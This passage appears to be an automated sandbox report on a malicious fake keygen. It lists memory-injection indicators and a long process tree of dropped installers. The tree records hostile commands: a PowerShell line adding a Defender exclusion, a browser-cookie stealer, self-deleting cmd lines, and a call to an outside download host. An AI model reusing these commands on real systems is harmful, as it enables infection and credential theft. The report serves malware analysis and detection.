MicrosoftEdgeCP.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2640 setups.exe 224 setups.tmp 5064 MicrosoftEdge.exe 936 MicrosoftEdgeCP.exe 936 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 56 IoCs
description pid Process procid_target PID 4688 wrote to memory of 3292 4688 PKM.program.do.rysowania.wa.keygen.by.orion.exe 78 PID 4688 wrote to memory of 3292 4688 PKM.program.do.rysowania.wa.keygen.by.orion.exe 78 PID 4688 wrote to memory of 3292 4688 PKM.program.do.rysowania.wa.keygen.by.orion.exe 78 PID 3292 wrote to memory of 3168 3292 cmd.exe 81 PID 3292 wrote to memory of 3168 3292 cmd.exe 81 PID 3292 wrote to memory of 3168 3292 cmd.exe 81 PID 3292 wrote to memory of 4296 3292 cmd.exe 82 PID 3292 wrote to memory of 4296 3292 cmd.exe 82 PID 3292 wrote to memory of 4296 3292 cmd.exe 82 PID 3292 wrote to memory of 4044 3292 cmd.exe 83 PID 3292 wrote to memory of 4044 3292 cmd.exe 83 PID 3292 wrote to memory of 4044 3292 cmd.exe 83 PID 3292 wrote to memory of 2056 3292 cmd.exe 84 PID 3292 wrote to memory of 2056 3292 cmd.exe 84 PID 3292 wrote to memory of 2056 3292 cmd.exe 84 PID 3168 wrote to memory of 1468 3168 keygen-pr.exe 85 PID 3168 wrote to memory of 1468 3168 keygen-pr.exe 85 PID 3168 wrote to memory of 1468 3168 keygen-pr.exe 85 PID 2056 wrote to memory of 1464 2056 keygen-step-4.exe 86 PID 2056 wrote to memory of 1464 2056 keygen-step-4.exe 86 PID 1468 wrote to memory of 1868 1468 key.exe 87 PID 1468 wrote to memory of 1868 1468 key.exe 87 PID 1468 wrote to memory of 1868 1468 key.exe 87 PID 4044 wrote to memory of 2172 4044 keygen-step-3.exe 88 PID 4044 wrote to memory of 2172 4044 keygen-step-3.exe 88 PID 4044 wrote to memory of 2172 4044 keygen-step-3.exe 88 PID 2172 wrote to memory of 4636 2172 cmd.exe 90 PID 2172 wrote to memory of 4636 2172 cmd.exe 90 PID 2172 wrote to memory of 4636 2172 cmd.exe 90 PID 1464 wrote to memory of 2644 1464 Setup.exe 91 PID 1464 wrote to memory of 2644 1464 Setup.exe 91 PID 1464 wrote to memory of 2640 1464 Setup.exe 92 PID 1464 wrote to memory of 2640 1464 Setup.exe 92 PID 1464 wrote to memory of 2640 1464 Setup.exe 92 PID 2056 wrote to memory of 2480 2056 keygen-step-4.exe 93 PID 2056 wrote to memory of 2480 2056 keygen-step-4.exe 93 PID 2056 wrote to memory of 2480 2056 keygen-step-4.exe 93 PID 2640 wrote to memory of 224 2640 setups.exe 94 PID 2640 wrote to memory of 224 2640 setups.exe 94 PID 2640 wrote to memory of 224 2640 setups.exe 94 PID 2480 wrote to memory of 4620 2480 askinstall20.exe 95 PID 2480 wrote to memory of 4620 2480 askinstall20.exe 95 PID 2480 wrote to memory of 4620 2480 askinstall20.exe 95 PID 4620 wrote to memory of 3996 4620 cmd.exe 98 PID 4620 wrote to memory of 3996 4620 cmd.exe 98 PID 4620 wrote to memory of 3996 4620 cmd.exe 98 PID 2644 wrote to memory of 748 2644 multitimer.exe 103 PID 2644 wrote to memory of 748 2644 multitimer.exe 103 PID 2056 wrote to memory of 2212 2056 keygen-step-4.exe 104 PID 2056 wrote to memory of 2212 2056 keygen-step-4.exe 104 PID 2056 wrote to memory of 2212 2056 keygen-step-4.exe 104 PID 748 wrote to memory of 4024 748 multitimer.exe 105 PID 748 wrote to memory of 4024 748 multitimer.exe 105 PID 936 wrote to memory of 1164 936 MicrosoftEdgeCP.exe 102 PID 936 wrote to memory of 1164 936 MicrosoftEdgeCP.exe 102 PID 936 wrote to memory of 1164 936 MicrosoftEdgeCP.exe 102
Processes
-
C:\Users\Admin\AppData\Local\Temp\PKM.program.do.rysowania.wa.keygen.by.orion.exe"C:\Users\Admin\AppData\Local\Temp\PKM.program.do.rysowania.wa.keygen.by.orion.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4688 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3292 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3168 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1468 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:1868
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:4296
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4044 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:4636
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2056 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Users\Admin\AppData\Local\Temp\VF4E5OP561\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\VF4E5OP561\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Users\Admin\AppData\Local\Temp\VF4E5OP561\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\VF4E5OP561\multitimer.exe" 1 3.1616621349.605baf2563366 1016⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:748 -
C:\Users\Admin\AppData\Local\Temp\VF4E5OP561\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\VF4E5OP561\multitimer.exe" 2 3.1616621349.605baf25633667⤵
- Executes dropped EXE
PID:4024 -
C:\Users\Admin\AppData\Local\Temp\2ijfg2mdcyf\vict.exe"C:\Users\Admin\AppData\Local\Temp\2ijfg2mdcyf\vict.exe" /VERYSILENT /id=5358⤵PID:4640
-
C:\Users\Admin\AppData\Local\Temp\is-DCH42.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-DCH42.tmp\vict.tmp" /SL5="$80300,870426,780800,C:\Users\Admin\AppData\Local\Temp\2ijfg2mdcyf\vict.exe" /VERYSILENT /id=5359⤵PID:2432
-
C:\Users\Admin\AppData\Local\Temp\is-OFDJI.tmp\winhost.exe"C:\Users\Admin\AppData\Local\Temp\is-OFDJI.tmp\winhost.exe" 53510⤵PID:5664
-
C:\Windows\SysWOW64\cmd.execmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\vQTjlLiUA.dll"11⤵PID:4456
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Users\Admin\AppData\Local\Temp\vQTjlLiUA.dll"12⤵PID:6040
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1ismkz2ydvs\ikqy3ektrwn.exe"C:\Users\Admin\AppData\Local\Temp\1ismkz2ydvs\ikqy3ektrwn.exe" /VERYSILENT8⤵PID:2360
-
C:\Users\Admin\AppData\Local\Temp\is-GM9MU.tmp\ikqy3ektrwn.tmp"C:\Users\Admin\AppData\Local\Temp\is-GM9MU.tmp\ikqy3ektrwn.tmp" /SL5="$60130,2592217,780800,C:\Users\Admin\AppData\Local\Temp\1ismkz2ydvs\ikqy3ektrwn.exe" /VERYSILENT9⤵PID:3284
-
C:\Users\Admin\AppData\Local\Temp\is-LO9P2.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-LO9P2.tmp\winlthsth.exe"10⤵PID:5736
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 82011⤵
- Program crash
PID:5324
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3qlajh4qwwk\xhblbbfnhxb.exe"C:\Users\Admin\AppData\Local\Temp\3qlajh4qwwk\xhblbbfnhxb.exe" /ustwo INSTALL8⤵PID:200
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "xhblbbfnhxb.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\3qlajh4qwwk\xhblbbfnhxb.exe" & exit9⤵PID:6136
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "xhblbbfnhxb.exe" /f10⤵
- Kills process with taskkill
PID:3612
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\h2zcca02mct\AwesomePoolU1.exe"C:\Users\Admin\AppData\Local\Temp\h2zcca02mct\AwesomePoolU1.exe"8⤵PID:3140
-
-
C:\Users\Admin\AppData\Local\Temp\pwxgwww0zlh\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\pwxgwww0zlh\Setup3310.exe" /Verysilent /subid=5778⤵PID:4036
-
C:\Users\Admin\AppData\Local\Temp\is-9IUBL.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-9IUBL.tmp\Setup3310.tmp" /SL5="$10352,138429,56832,C:\Users\Admin\AppData\Local\Temp\pwxgwww0zlh\Setup3310.exe" /Verysilent /subid=5779⤵PID:5756
-
C:\Users\Admin\AppData\Local\Temp\is-UC114.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-UC114.tmp\Setup.exe" /Verysilent10⤵PID:6044
-
C:\Program Files (x86)\Versium Research\Versium Research\customer5.exe"C:\Program Files (x86)\Versium Research\Versium Research\customer5.exe"11⤵PID:4500
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"12⤵PID:5564
-
-
-
C:\Program Files (x86)\Versium Research\Versium Research\hjjgaa.exe"C:\Program Files (x86)\Versium Research\Versium Research\hjjgaa.exe"11⤵PID:4468
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:2684
-
-
-
C:\Program Files (x86)\Versium Research\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\Versium Research\Versium Research\jg7_7wjg.exe"11⤵PID:4436
-
-
C:\Program Files (x86)\Versium Research\Versium Research\LabPicV3.exe"C:\Program Files (x86)\Versium Research\Versium Research\LabPicV3.exe"11⤵PID:5256
-
C:\Users\Admin\AppData\Local\Temp\is-UPSSN.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-UPSSN.tmp\LabPicV3.tmp" /SL5="$5013E,239334,155648,C:\Program Files (x86)\Versium Research\Versium Research\LabPicV3.exe"12⤵PID:4404
-
C:\Users\Admin\AppData\Local\Temp\is-HR7HO.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-HR7HO.tmp\ppppppfy.exe" /S /UID=lab21413⤵PID:3664
-
-
-
-
C:\Program Files (x86)\Versium Research\Versium Research\vlcplayer.exe"C:\Program Files (x86)\Versium Research\Versium Research\vlcplayer.exe"11⤵PID:3480
-
-
C:\Program Files (x86)\Versium Research\Versium Research\black_.exe"C:\Program Files (x86)\Versium Research\Versium Research\black_.exe"11⤵PID:5448
-
-
C:\Program Files (x86)\Versium Research\Versium Research\INr0xRwilfeIDzO0jj8ipF07.exe"C:\Program Files (x86)\Versium Research\Versium Research\INr0xRwilfeIDzO0jj8ipF07.exe"11⤵PID:5460
-
-
C:\Program Files (x86)\Versium Research\Versium Research\RunWW.exe"C:\Program Files (x86)\Versium Research\Versium Research\RunWW.exe"11⤵PID:3212
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\chstjlcbakz\vpn.exe"C:\Users\Admin\AppData\Local\Temp\chstjlcbakz\vpn.exe" /silent /subid=4828⤵PID:3916
-
-
C:\Users\Admin\AppData\Local\Temp\f5i5ngiuftm\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\f5i5ngiuftm\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:5904
-
C:\Users\Admin\AppData\Local\Temp\is-6MDB7.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-6MDB7.tmp\IBInstaller_97039.tmp" /SL5="$30460,9887378,721408,C:\Users\Admin\AppData\Local\Temp\f5i5ngiuftm\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵PID:5996
-
-
-
C:\Users\Admin\AppData\Local\Temp\udletihjbfo\app.exe"C:\Users\Admin\AppData\Local\Temp\udletihjbfo\app.exe" /8-238⤵PID:5948
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Green-Darkness"9⤵PID:5512
-
-
C:\Program Files (x86)\Green-Darkness\7za.exe"C:\Program Files (x86)\Green-Darkness\7za.exe" e -p154.61.71.51 winamp-plugins.7z9⤵PID:1180
-
-
-
C:\Users\Admin\AppData\Local\Temp\zecz12ce0p5\i4ugilolber.exe"C:\Users\Admin\AppData\Local\Temp\zecz12ce0p5\i4ugilolber.exe" /quiet SILENT=1 AF=7568⤵PID:5172
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\zecz12ce0p5\i4ugilolber.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\zecz12ce0p5\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1616361844 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:5616
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\M5BMTOWUET\setups.exe"C:\Users\Admin\AppData\Local\Temp\M5BMTOWUET\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Users\Admin\AppData\Local\Temp\is-25HND.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-25HND.tmp\setups.tmp" /SL5="$8006C,250374,58368,C:\Users\Admin\AppData\Local\Temp\M5BMTOWUET\setups.exe" ll6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:224
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2480 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:4620 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3996
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵
- Executes dropped EXE
PID:2212
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵PID:5412
-
C:\Users\Admin\AppData\Roaming\B953.tmp.exe"C:\Users\Admin\AppData\Roaming\B953.tmp.exe"5⤵PID:5980
-
C:\Users\Admin\AppData\Roaming\B953.tmp.exe"C:\Users\Admin\AppData\Roaming\B953.tmp.exe"6⤵PID:5824
-
-
-
C:\Users\Admin\AppData\Roaming\BD3C.tmp.exe"C:\Users\Admin\AppData\Roaming\BD3C.tmp.exe"5⤵PID:5168
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵PID:3676
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:1288
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"4⤵PID:5708
-
C:\ProgramData\5959238.exe"C:\ProgramData\5959238.exe"5⤵PID:3696
-
-
C:\ProgramData\5645615.exe"C:\ProgramData\5645615.exe"5⤵PID:5820
-
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"6⤵PID:2332
-
-
-
C:\ProgramData\319152.exe"C:\ProgramData\319152.exe"5⤵PID:1908
-
-
C:\ProgramData\4488178.exe"C:\ProgramData\4488178.exe"5⤵PID:1080
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"4⤵PID:6088
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:5584
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5064
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:4304
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:936
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:1164
-
C:\Users\Admin\AppData\Local\Temp\is-L3I32.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-L3I32.tmp\vpn.tmp" /SL5="$10312,15170975,270336,C:\Users\Admin\AppData\Local\Temp\chstjlcbakz\vpn.exe" /silent /subid=4821⤵PID:5152
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "2⤵PID:5988
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap09013⤵PID:4736
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "2⤵PID:2076
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap09013⤵PID:3140
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-9IRDV.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-9IRDV.tmp\{app}\chrome_proxy.exe"1⤵PID:5308
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://italyfabricone.club/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=970391⤵PID:5272
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:3636
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 52365866270DD45E8849817696955AF8 C2⤵PID:6096
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A012B0E4503C64FC4E8A2E0D053320B82⤵PID:4452
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:5388
-
C:\Windows\system32\regsvr32.exe/s "C:\Users\Admin\AppData\Local\Temp\vQTjlLiUA.dll"1⤵PID:3544
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:640